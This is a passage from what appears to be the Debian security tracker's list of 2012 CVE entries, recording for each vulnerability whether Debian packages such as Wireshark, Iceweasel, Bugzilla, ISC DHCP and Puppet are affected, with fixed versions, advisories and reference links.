NOT-FOR-US: Google Chrome OS CVE-2012-4049 (epan/dissectors/packet-nfs.c in the NFS dissector in Wireshark 1.4.x ...) - wireshark 1.8.2-1 [squeeze] - wireshark (Vulnerable code not present) NOTE: http://www.wireshark.org/security/wnpa-sec-2012-12.html NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/2 CVE-2012-4048 (The PPP dissector in Wireshark 1.4.x before 1.4.14, 1.6.x before ...) {DSA-2590-1} - wireshark 1.8.2-1 (bug #680056) NOTE: http://www.wireshark.org/security/wnpa-sec-2012-11.html NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/1 NOTE: http://www.openwall.com/lists/oss-security/2012/07/24/2 CVE-2012-4033 (Multiple unspecified vulnerabilities in the Zingiri Web Shop plugin ...) NOT-FOR-US: Zingiri not in Debian CVE-2012-4032 (Open redirect vulnerability in the login page in WebsitePanel before ...) NOT-FOR-US: WebsitePanel not in Debian CVE-2012-4031 (Multiple directory traversal vulnerabilities in src/acloglogin.php in ...) NOT-FOR-US: Wangkongbao not in Debian CVE-2012-4030 RESERVED CVE-2012-4029 RESERVED CVE-2012-4028 (Tridium Niagara AX Framework does not properly store credential data, ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-4027 (Directory traversal vulnerability in Tridium Niagara AX Framework ...) NOT-FOR-US: Tridium Niagara AX Framework CVE-2012-4026 (The Johnson Controls Pegasys P2000 server with software before 3.11 ...) NOT-FOR-US: The Johnson Controls Pegasys P2000 CVE-2012-4025 (Integer overflow in the queue_init function in unsquashfs.c in ...) - squashfs-tools 1:4.2+20121212-1 (low; bug #683371) [squeeze] - squashfs-tools (Minor issue) [wheezy] - squashfs-tools (Minor issue) CVE-2012-4024 (Stack-based buffer overflow in the get_component function in ...) 
- squashfs-tools 1:4.2+20121212-1 (low; bug #683371) [squeeze] - squashfs-tools (Minor issue) [wheezy] - squashfs-tools (Minor issue) CVE-2012-4023 (CRLF injection vulnerability in Pebble before 2.6.4 allows remote ...) NOT-FOR-US: Pebble blog CVE-2012-4022 (Pebble before 2.6.4 allows remote attackers to trigger loss of ...) NOT-FOR-US: Pebble blog CVE-2012-4021 (MosP kintai kanri before 4.1.0 does not properly perform ...) NOT-FOR-US: MosP kintai kanri CVE-2012-4020 (MosP kintai kanri before 4.1.0 does not enforce privilege ...) NOT-FOR-US: MosP kintai kanri CVE-2012-4019 (Cross-site scripting (XSS) vulnerability in tokyo_bbs.cgi in Come on ...) NOT-FOR-US: Come on Girls Interface (CGI) Tokyo BBS CVE-2012-4018 (Cross-site scripting (XSS) vulnerability in Final Beta Laboratory ...) NOT-FOR-US: Final Beta Laboratory MyWebSearch CVE-2012-4017 (The jigbrowser+ application before 1.5.0 for Android does not properly ...) NOT-FOR-US: Android application CVE-2012-4016 (The ATOK application before 1.0.4 for Android allows remote attackers ...) NOT-FOR-US: Android application CVE-2012-4015 (Cross-site scripting (XSS) vulnerability in the management screen in ...) NOT-FOR-US: My Little tool / My little admin SQL server 2000 CVE-2012-4014 (Unspecified vulnerability in McAfee Email Anti-virus (formerly ...) NOT-FOR-US: McAfee Email Anti-virus CVE-2012-4013 (The WebView class in the Cybozu KUNAI Browser for Remote Service ...) NOT-FOR-US: Cybozu KUNAI Browser CVE-2012-4012 (The WebView class in the Cybozu KUNAI application before 2.0.6 for ...) NOT-FOR-US: Cybozu KUNAI CVE-2012-4011 (The Cybozu KUNAI application before 2.0.6 for Android allows remote ...) NOT-FOR-US: Cybozu KUNAI CVE-2012-4010 (Opera before 11.60 allows remote attackers to spoof the address bar ...) NOT-FOR-US: Opera CVE-2012-4009 (The WebView class in the Cybozu Live application 1.0.4 and earlier for ...) 
NOT-FOR-US: Cybozu Live CVE-2012-4008 (The Cybozu Live application 1.0.4 and earlier for Android allows ...) NOT-FOR-US: Cybozu Live CVE-2012-4007 (The mixi application before 4.3.0 for Android allows remote attackers ...) NOT-FOR-US: mixi application for Android CVE-2012-4006 (The GREE application before 1.4.0, GREE Tanken Dorirando application ...) NOT-FOR-US: GREE application for Android CVE-2012-4005 (The NHN Japan NAVER LINE application before 2.5.5 for Android does not ...) NOT-FOR-US: NHN Japan NAVER LINE CVE-2012-4004 (Cross-site scripting (XSS) vulnerability in the Sleipnir Mobile ...) NOT-FOR-US: Sleipnir Mobile CVE-2012-4003 (Multiple cross-site scripting (XSS) vulnerabilities in GLPI-PROJECT ...) - glpi 0.83.31-1 (unimportant) NOTE: Only supported behind an authenticated HTTP zone NOTE: https://forge.indepnet.net/projects/glpi/versions/771 NOTE: http://www.openwall.com/lists/oss-security/2012/07/13/1 CVE-2012-4002 (Cross-site request forgery (CSRF) vulnerability in GLPI-PROJECT GLPI ...) - glpi 0.83.31-1 (unimportant) NOTE: Only supported behind an authenticated HTTP zone NOTE: https://forge.indepnet.net/projects/glpi/versions/771 NOTE: http://www.openwall.com/lists/oss-security/2012/07/13/1 CVE-2012-4001 (The mod_pagespeed module before 0.10.22.6 for the Apache HTTP Server ...) NOT-FOR-US: mod_pagespeed CVE-2012-4000 (Cross-site scripting (XSS) vulnerability in the print_textinputs_var ...) {DSA-2522-1} - fckeditor 1:2.6.6-3 (bug #683418) NOTE: http://disse.cting.org/2012/06/22/fckeditor-reflected-xss-vulnerability/ CVE-2012-3999 (Cross-site scripting (XSS) vulnerability in admin/login.php in Sticky ...) NOT-FOR-US: Sticky Notes CVE-2012-3998 (Multiple SQL injection vulnerabilities in Sticky Notes before ...) NOT-FOR-US: Sticky Notes CVE-2012-3997 (Multiple cross-site scripting (XSS) vulnerabilities in Sticky Notes ...) NOT-FOR-US: Sticky Notes CVE-2012-3996 (TikiWiki CMS/Groupware 8.3 and earlier allows remote attackers to ...) 
- tikiwiki CVE-2012-3995 (The IsCSSWordSpacingSpace function in Mozilla Firefox before 16.0, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3994 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3993 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3992 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3991 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3990 (Use-after-free vulnerability in the IME State Manager implementation ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3989 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3988 (Use-after-free vulnerability in Mozilla Firefox before 16.0, Firefox ...) 
- iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-3987 (Mozilla Firefox before 16.0 on Android assigns chrome privileges to ...) - iceweasel (Android-specific) CVE-2012-3986 (Mozilla Firefox before 16.0, Firefox ESR 10.x before 10.0.8, ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 CVE-2012-3985 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3984 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3983 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) - iceweasel (Only affects Firefox >= 10) - icedove (Only affects Firefox >= 10) - iceape (Only affects Firefox >= 10) CVE-2012-3982 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...) {DSA-2572-1 DSA-2569-1 DSA-2565-1} - iceweasel 10.0.8esr-1 - icedove 10.0.9-1 - iceape 2.7.9-1 [squeeze] - iceape (Vulnerable code not present) [squeeze] - icedove (Vulnerable code not present) [squeeze] - iceweasel (Vulnerable code not present) CVE-2012-4747 (Bugzilla 2.x and 3.x through 3.6.11, 3.7.x and 4.0.x before 4.0.8, ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=785522 NOTE: https://bugzilla.mozilla.org/show_bug.cgi?id=785511 CVE-2012-3981 (Auth/Verify/LDAP.pm in Bugzilla 2.x and 3.x before 3.6.11, 3.7.x and ...) - bugzilla (low) [squeeze] - bugzilla (Minor issue) - bugzilla4 (bug #669643) CVE-2012-3980 (The web console in Mozilla Firefox before 15.0, Firefox ESR 10.x ...) 
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3979 (Mozilla Firefox before 15.0 on Android does not properly implement ...)
	- iceweasel (Only affects Firefox for Android)
CVE-2012-3978 (The nsLocation::CheckURL function in Mozilla Firefox before 15.0, ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-3977 REJECTED
CVE-2012-3976 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, and ...)
	- iceweasel 10.0.7esr-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3975 (The DOMParser component in Mozilla Firefox before 15.0, Thunderbird ...)
	- iceweasel (Only affects Firefox >= 10)
	- icedove (Only affects Firefox >= 10)
	- iceape (Only affects Firefox >= 10)
CVE-2012-3974 (Untrusted search path vulnerability in the installer in Mozilla ...)
	- iceweasel (Only affects Firefox for Windows)
CVE-2012-3973 (The debugger in the developer-tools subsystem in Mozilla Firefox ...)
	- iceweasel (Only affects Firefox >= 10)
CVE-2012-3972 (The format-number functionality in the XSLT implementation in Mozilla ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-3971 (Summer Institute of Linguistics (SIL) Graphite 2, as used in Mozilla ...)
	- iceweasel (Only affects Firefox >= 10)
	- icedove (Only affects Firefox >= 10)
	- iceape (Only affects Firefox >= 10)
CVE-2012-3970 (Use-after-free vulnerability in the nsTArray_base::Length function in ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3969 (Integer overflow in the nsSVGFEMorphologyElement::Filter function in ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-3968 (Use-after-free vulnerability in the WebGL implementation in Mozilla ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3967 (The WebGL implementation in Mozilla Firefox before 15.0, Firefox ESR ...)
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3966 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, ...)
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3965 (Mozilla Firefox before 15.0 does not properly restrict navigation to ...)
	- iceweasel (Only affects Firefox >= 10)
CVE-2012-3964 (Use-after-free vulnerability in the gfxTextRun::GetUserData function ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3963 (Use-after-free vulnerability in the js::gc::MapAllocToTraceKind ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3962 (Mozilla Firefox before 15.0, Firefox ESR 10.x before 10.0.7, ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-3961 (Use-after-free vulnerability in the RangeData implementation in ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3960 (Use-after-free vulnerability in the ...)
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3959 (Use-after-free vulnerability in the nsRangeUpdater::SelAdjDeleteNode ...)
	{DSA-2556-1 DSA-2554-1 DSA-2553-1}
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
CVE-2012-3958 (Use-after-free vulnerability in the ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3957 (Heap-based buffer overflow in the nsBlockFrame::MarkLineDirty function ...)
	- iceweasel 10.0.7esr-1
	- icedove 10.0.7-1
	- iceape 2.7.7-1
	[squeeze] - iceape (Vulnerable code not present)
	[squeeze] - icedove (Vulnerable code not present)
	[squeeze] - iceweasel (Vulnerable code not present)
CVE-2012-3956 (Use-after-free vulnerability in the ...)
	- iceweasel (Vulnerable code not present in Firefox 10.x codebase)
	- icedove (Vulnerable code not present in Firefox 10.x codebase)
	- iceape (Vulnerable code not present in Firefox 10.x codebase)
CVE-2012-3955 (ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows ...)
	{DSA-2551-1}
	- isc-dhcp 4.2.4-2
	[wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1
CVE-2012-3954 (Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and ...)
	{DSA-2519-2 DSA-2519-1 DSA-2516-1}
	- isc-dhcp 4.2.4-2 (bug #686174)
	[wheezy] - isc-dhcp 4.2.2.dfsg.1-5+deb70u1
CVE-2012-3953 (SQL injection vulnerability in admin/index.php in phpList before ...)
	NOT-FOR-US: phplist
CVE-2012-3952 (Cross-site scripting (XSS) vulnerability in admin/index.php in phpList ...)
	NOT-FOR-US: phplist
CVE-2012-3951 (The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL ...)
	NOT-FOR-US: Plixer Scrutinizer
CVE-2012-3950 (The Intrusion Prevention System (IPS) feature in Cisco IOS 12.3 ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3949 (The SIP implementation in Cisco Unified Communications Manager (CUCM) ...)
	NOT-FOR-US: Cisco Unified Communications Manager
CVE-2012-3948 RESERVED
CVE-2012-3947 RESERVED
CVE-2012-3946 RESERVED
CVE-2012-3945 RESERVED
CVE-2012-3944 RESERVED
CVE-2012-3943 RESERVED
CVE-2012-3942 RESERVED
CVE-2012-3941 (Heap-based buffer overflow in the Cisco WebEx Recording Format (WRF) ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3940 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3939 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3938 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3937 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3936 (Buffer overflow in the Cisco WebEx Recording Format (WRF) player T27 ...)
	NOT-FOR-US: Cisco WebEx
CVE-2012-3935 (Cisco Unified Presence (CUP) before 8.6(3) and Jabber Extensible ...)
	NOT-FOR-US: Cisco Unified Presence, Jabber Extensible Communications Platform
CVE-2012-3934 RESERVED
CVE-2012-3933 RESERVED
CVE-2012-3932 RESERVED
CVE-2012-3931 RESERVED
CVE-2012-3930 RESERVED
CVE-2012-3929 RESERVED
CVE-2012-3928 RESERVED
CVE-2012-3927 RESERVED
CVE-2012-3926 RESERVED
CVE-2012-3925 RESERVED
CVE-2012-3924 (The SSLVPN implementation in Cisco IOS 15.1 and 15.2, when DTLS is ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3923 (The SSLVPN implementation in Cisco IOS 12.4, 15.0, 15.1, and 15.2, ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3922 RESERVED
CVE-2012-3921 RESERVED
CVE-2012-3920 RESERVED
CVE-2012-3919 (The Cisco Application Control Engine (ACE) module 3.0 for Cisco ...)
	NOT-FOR-US: Cisco Application Control Engine
CVE-2012-3918 RESERVED
CVE-2012-3917 RESERVED
CVE-2012-3916 RESERVED
CVE-2012-3915 (The DMVPN tunnel implementation in Cisco IOS 15.2 allows remote ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3914 RESERVED
CVE-2012-3913 RESERVED
CVE-2012-3912 RESERVED
CVE-2012-3911 RESERVED
CVE-2012-3910 RESERVED
CVE-2012-3909 RESERVED
CVE-2012-3908 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ISE ...)
	NOT-FOR-US: Cisco Identity Services Engine
CVE-2012-3907 RESERVED
CVE-2012-3906 RESERVED
CVE-2012-3905 RESERVED
CVE-2012-3904 RESERVED
CVE-2012-3903 RESERVED
CVE-2012-3902 RESERVED
CVE-2012-3901 (The updateTime function in sensorApp on Cisco IPS 4200 series sensors ...)
	NOT-FOR-US: Cisco IPS 4200
CVE-2012-3900 RESERVED
CVE-2012-3899 (sensorApp on Cisco IPS 4200 series sensors 6.0, 6.2, and 7.0 does not ...)
	NOT-FOR-US: Cisco IPS 4200
CVE-2012-3898 RESERVED
CVE-2012-3897 RESERVED
CVE-2012-3896 RESERVED
CVE-2012-3895 (Cisco IOS 15.0 through 15.3 allows remote authenticated users to cause ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3894 RESERVED
CVE-2012-3893 (The FlexVPN implementation in Cisco IOS 15.2 and 15.3 allows remote ...)
	NOT-FOR-US: Cisco IOS
CVE-2012-3892 RESERVED
CVE-2012-3891 RESERVED
CVE-2012-3890 (The in_mod plugin in Winamp before 5.63 allows remote attackers to ...)
	NOT-FOR-US: Winamp
CVE-2012-3889 (The in_mod plugin in Winamp before 5.63 allows remote attackers to ...)
	NOT-FOR-US: Winamp
CVE-2012-3888 (The login implementation in AirDroid 1.0.4 beta allows remote ...)
	NOT-FOR-US: AirDroid
CVE-2012-3887 (AirDroid before 1.0.7 beta uses a cleartext base64 format for data ...)
	NOT-FOR-US: AirDroid
CVE-2012-3886 (AirDroid 1.0.4 beta uses the MD5 algorithm for values in the ...)
	NOT-FOR-US: AirDroid
CVE-2012-3885 (The default configuration of AirDroid 1.0.4 beta uses a four-character ...)
	NOT-FOR-US: AirDroid
CVE-2012-3884 (AirDroid 1.0.4 beta implements authentication through direct ...)
	NOT-FOR-US: AirDroid
CVE-2012-3883 RESERVED
CVE-2012-3882 RESERVED
CVE-2012-3881 (Multiple SQL injection vulnerabilities in RTG 0.7.4 and RTG2 0.9.2 ...)
	NOT-FOR-US: RTG, RTG2
CVE-2012-3880 RESERVED
CVE-2012-3879 RESERVED
CVE-2012-3878 RESERVED
CVE-2012-3877 RESERVED
CVE-2012-3876 RESERVED
CVE-2012-3875 RESERVED
CVE-2012-3874 RESERVED
CVE-2012-3873 (Multiple SQL injection vulnerabilities in Open Constructor 3.12.0 ...)
	NOT-FOR-US: Open Constructor
CVE-2012-3872 (Multiple cross-site scripting (XSS) vulnerabilities in Open ...)
	NOT-FOR-US: Open Constructor
CVE-2012-3871 (Cross-site scripting (XSS) vulnerability in data/hybrid/i_hybrid.php ...)
	NOT-FOR-US: Open Constructor
CVE-2012-3870 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Open Constructor
CVE-2012-3869 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: REDAXO
CVE-2012-3868 (Race condition in the ns_client structure management in ISC BIND 9.9.x ...)
	NOTE: https://kb.isc.org/article/AA-00730
	- bind9 (Vulnerable code not present, only affects 9.9.x)
	- isc-dhcp (embeds bind 9.8.x; this issue only affects 9.9.x)
CVE-2012-3867 (lib/puppet/ssl/certificate_authority.rb in Puppet before 2.6.17 and ...)
	{DSA-2511-1}
	- puppet 2.7.18-1
CVE-2012-3866 (lib/puppet/defaults.rb in Puppet 2.7.x before 2.7.18, and Puppet ...)
	{DSA-2511-1}
	- puppet 2.7.18-1
CVE-2012-3865 (Directory traversal vulnerability in lib/puppet/reports/store.rb in ...)
	{DSA-2511-1}
	- puppet 2.7.18-1
CVE-2012-3864 (Puppet before 2.6.17 and 2.7.x before 2.7.18, and Puppet Enterprise ...)
	{DSA-2511-1}
	- puppet 2.7.18-1
CVE-2012-3862 RESERVED
CVE-2012-3861 RESERVED
CVE-2012-3860 RESERVED
CVE-2012-3859 (Unspecified vulnerability in the WebAdmin Portal in Netsweeper has ...)
	NOT-FOR-US: Netsweeper WebAdmin Portal
CVE-2012-3858 RESERVED
CVE-2012-3857 RESERVED
CVE-2012-3856 RESERVED
CVE-2012-3855 RESERVED
CVE-2012-3854 RESERVED
CVE-2012-3853 RESERVED
CVE-2012-3852 RESERVED
CVE-2012-3851 RESERVED
CVE-2012-3850 RESERVED
CVE-2012-3849 RESERVED
CVE-2012-3848 (Multiple cross-site scripting (XSS) vulnerabilities in the web console ...)
	NOT-FOR-US: Plixer Scrutinizer
CVE-2012-3863 (channels/chan_sip.c in Asterisk Open Source 1.8.x before 1.8.13.1 and ...)
	{DSA-2550-1}
	- asterisk 1:1.8.13.1~dfsg-1
CVE-2012-3847 (slssvc.exe in Invensys Wonderware SuiteLink in Invensys InTouch 2012 ...)
	NOT-FOR-US: Windows utility
CVE-2012-3846 (Cross-site scripting (XSS) vulnerability in index.php in PHP-pastebin ...)
	NOT-FOR-US: php-pastebin not in Debian
CVE-2012-3845 (Buffer overflow in LAN Messenger 1.2.28 and earlier allows remote ...)
	NOT-FOR-US: LAN Messenger not in Debian
CVE-2012-3844 (Cross-site scripting (XSS) vulnerability in vBulletin 4.1.12 allows ...)
	NOT-FOR-US: vBulletin not in Debian
CVE-2012-3843 (Cross-site scripting (XSS) vulnerability in the registration page in ...)
	NOT-FOR-US: e107 not in Debian
CVE-2012-3842 (Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in ...)
	NOT-FOR-US: DirectAdmin not in Debian
CVE-2012-3841 (Untrusted search path vulnerability in KMPlayer 3.2.0.19 allows local ...)
	NOT-FOR-US: KMPlayer not in Debian (not the KDE interface to mplayer)
CVE-2012-3840 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: MyClientBase not in Debian
CVE-2012-3839 (Multiple SQL injection vulnerabilities in ...)
	NOT-FOR-US: MyClientBase not in Debian
CVE-2012-3838 (Gekko before 1.2.0 allows remote attackers to obtain the installation ...)
	NOT-FOR-US: Baby Gekko not in Debian
CVE-2012-3837 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Baby Gekko not in Debian
CVE-2012-3836 (Multiple cross-site scripting (XSS) vulnerabilities in Baby Gekko ...)
	NOT-FOR-US: Baby Gekko not in Debian
CVE-2012-3835 (Multiple cross-site scripting (XSS) vulnerabilities in AlienVault Open ...)
	NOT-FOR-US: OSSIM not in Debian (different from Open Source Software Image Map)
CVE-2012-3834 (SQL injection vulnerability in forensics/base_qry_main.php in ...)
	NOT-FOR-US: OSSIM not in Debian (different from Open Source Software Image Map)
CVE-2012-3833 (Cross-site scripting (XSS) vulnerability in the default index page in ...)
	NOT-FOR-US: Quick.CMS not in Debian
CVE-2012-3832 (Cross-site scripting (XSS) vulnerability in decoda/Decoda.php in ...)
	NOT-FOR-US: Decoda not in Debian
CVE-2012-3831 (Cross-site scripting (XSS) vulnerability in decoda/templates/video.php ...)
	NOT-FOR-US: Decoda not in Debian
CVE-2012-3830 (Cross-site scripting (XSS) vulnerability in decoda/templates/video.php ...)
	NOT-FOR-US: Decoda not in Debian
CVE-2012-3829 (Joomla! 2.5.3 allows remote attackers to obtain the installation path ...)
	- joomla (bug #571794)
CVE-2012-3828 (Cross-site scripting (XSS) vulnerability in Joomla! 2.5.3 allows ...)
	- joomla (bug #571794)
CVE-2012-3827 RESERVED
CVE-2011-5096 (Stack-based buffer overflow in cstore.exe in the Media Application ...)
	NOT-FOR-US: Avaya Aura Application Server
CVE-2012-3826 (Multiple integer underflows in Wireshark 1.4.x before 1.4.13 and 1.6.x ...)
	- wireshark 1.6.8-1 (unimportant)
	[squeeze] - wireshark (vulnerable code appeared in 1.4/1.6)
	NOTE: not suitable for code injection
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125
	NOTE: leftover of CVE-2012-2392
CVE-2012-3825 (Multiple integer overflows in Wireshark 1.4.x before 1.4.13 and 1.6.x ...)
	- wireshark 1.6.8-1 (unimportant)
	[squeeze] - wireshark (vulnerable code appeared in 1.4/1.6)
	NOTE: not suitable for code injection
	NOTE: https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=7125
	NOTE: leftover of CVE-2012-2392
CVE-2012-3824 RESERVED
CVE-2012-3823 RESERVED
CVE-2012-3822 RESERVED
CVE-2012-3821 RESERVED
CVE-2012-3820 RESERVED
CVE-2012-3819 (Stack consumption vulnerability in dartwebserver.dll 1.9 and earlier, ...)
	NOT-FOR-US: dartwebserver.dll
CVE-2012-3818 (The fpm exporter in Revelation 0.4.13-2 and earlier encrypts the ...)
	- revelation 0.4.13-1.2 (bug #680059)
	[squeeze] - revelation (Minor issue)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-3818
	NOTE: http://knoxin.blogspot.co.uk/2012/06/revelation-password-manager-considered.html
	NOTE: http://als.regnet.cz/fpm2/feedback/2
CVE-2012-3817 (ISC BIND 9.4.x, 9.5.x, 9.6.x, and 9.7.x before 9.7.6-P2; 9.8.x before ...)
	{DSA-2517-1}
	- bind9 1:9.8.1.dfsg.P1-4.2 (bug #683259)
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
	NOTE: https://kb.isc.org/article/AA-00729
CVE-2012-XXXX [packagekit insecure temp file]
	- packagekit 0.7.6-1 (bug #678189)
CVE-2012-3816 (WinRadius Server 2009 allows remote attackers to cause a denial of ...)
	NOT-FOR-US: WinRadius
CVE-2012-3815 (Buffer overflow in RunTime.exe in Sielco Sistemi Winlog Pro SCADA ...)
	NOT-FOR-US: Sielco Sistemi Winlog
CVE-2012-3814 (Unrestricted file upload vulnerability in font-upload.php in the Font ...)
	NOT-FOR-US: WordPress plugin
CVE-2012-3813 RESERVED
CVE-2012-3812 (Double free vulnerability in apps/app_voicemail.c in Asterisk Open ...)
	{DSA-2550-1}
	- asterisk 1:1.8.13.1~dfsg-1 (bug #680470)
	[squeeze] - asterisk (Vulnerable code not present)
CVE-2012-3811 (Unrestricted file upload vulnerability in ImageUpload.ashx in the ...)
	NOT-FOR-US: Avaya IP Office Customer Call Reporter
CVE-2012-3810 RESERVED
CVE-2012-3809 RESERVED
CVE-2012-3808 RESERVED
CVE-2012-3807 RESERVED
CVE-2012-3806 RESERVED
CVE-2012-3805 (Multiple cross-site scripting (XSS) vulnerabilities in the ...)
	NOT-FOR-US: Kajona
	NOTE: HTB23097
CVE-2012-3804 RESERVED
CVE-2012-3803 RESERVED
CVE-2012-3802 (Unspecified vulnerability in the Post Affiliate Pro (PAP) module for ...)
	NOT-FOR-US: Drupal module
CVE-2012-3801 REJECTED
CVE-2012-3800 (Cross-site scripting (XSS) vulnerability in og.js in the Organic ...)
